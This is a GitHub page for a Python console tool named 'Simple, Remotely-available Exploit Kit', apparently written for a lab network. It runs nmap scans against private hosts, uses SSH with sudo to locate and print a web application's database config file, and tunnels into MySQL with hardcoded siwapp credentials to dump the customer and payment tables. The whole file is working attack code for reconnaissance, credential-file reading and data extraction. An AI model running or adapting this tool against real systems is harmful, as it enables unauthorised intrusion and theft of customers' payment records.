-
Notifications
You must be signed in to change notification settings - Fork 0
Expand file tree
/
Copy pathremote_exploit_exec.py
More file actions
116 lines (98 loc) · 3.81 KB
/
remote_exploit_exec.py
File metadata and controls
116 lines (98 loc) · 3.81 KB
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
from consolemenu import *
from consolemenu.items import *
import subprocess
import pymysql
import paramiko
import pandas as pd
import sys
import os
from paramiko import SSHClient
from sshtunnel import SSHTunnelForwarder
from os.path import expanduser
import os
hostname = ""
username = ''
password = ''
commands = [
"sudo find /var/www/ -name database*",
"sudo cat /var/www/html/config/databases.yml"
]
sql_hostname = '192.168.92.181'
sql_username = 'siwapp'
sql_password = 'siwapp'
sql_main_database = 'siwapp'
sql_port = 3306
#Identify absolute path to this script
dirname = os.path.dirname(os.path.abspath(__file__))
def dbSearch():
# initialize the SSH client
client = paramiko.SSHClient()
# add to known hosts
client.set_missing_host_key_policy(paramiko.AutoAddPolicy())
try:
client.connect(hostname=hostname, username=username, password=password)
except:
print("[!] Cannot connect to the SSH Server")
exit()
# execute the commands
for command in commands:
print("="*50, command, "="*50)
stdin, stdout, stderr = client.exec_command(command)
print(stdout.read().decode())
err = stderr.read().decode()
input("Press Enter to continue...")
if err:
print(err)
def flushTables():
with SSHTunnelForwarder(
(hostname, 22),
ssh_username=username,
ssh_password=password,
remote_bind_address=(sql_hostname, sql_port)) as tunnel:
conn = pymysql.connect(host='127.0.0.1', user=sql_username,
passwd=sql_password, db=sql_main_database,
port=tunnel.local_bind_port)
query = [
'''SHOW TABLES;''',
'''select * from customer;''',
'''select * from payment;'''
]
for command in query:
print("="*50, command, "="*50)
data = pd.read_sql_query(command, conn)
print(data)
input("Press Enter to continue...")
conn.close()
def simpleNmapScan():
if 'win' in sys.platform:
cmd = os.path.join(dirname, 'simpleNmap.bat')
subprocess.call(cmd)
elif 'linux' in sys.platform:
os.system('echo =============================================================================================================================================')
os.system('sudo nmap -sV -T4 -O -F --version-light 192.168.93.30 192.168.93.31 192.168.93.37 192.168.93.43 192.168.93.44 192.168.93.45 192.168.93.48 192.168.93.49')
def aggressiveNmapScan():
if 'win' in sys.platform:
cmd = os.path.join(dirname, 'aggressiveNmap.bat')
subprocess.call(cmd)
elif 'linux' in sys.platform:
os.system('echo ==============================================================================================================================')
os.system('sudo nmap -T4 -A -v 192.168.93.30 192.168.93.31 192.168.93.37 192.168.93.43 192.168.93.44 192.168.93.45 192.168.93.48 192.168.93.49')
def main():
# Create the menu
menu = ConsoleMenu(
"Simple, Remotely-available Exploit Kit", "The answer is 42...")
# A FunctionItem runs a Python function when selected
simpleNmap = FunctionItem("Run a simple NMAP Scan", simpleNmapScan)
aggressiveNmap = FunctionItem(
"Run a aggressive NMAP Scan", aggressiveNmapScan)
databaseSearch = FunctionItem("Search for Database Files", dbSearch)
flushDB = FunctionItem("Connect to and search DB", flushTables)
# Once we're done creating them, we just add the items to the menu
menu.append_item(simpleNmap)
menu.append_item(aggressiveNmap)
menu.append_item(databaseSearch)
menu.append_item(flushDB)
# Finally, we call show to show the menu and allow the user to interact
menu.show()
if __name__ == '__main__':
main()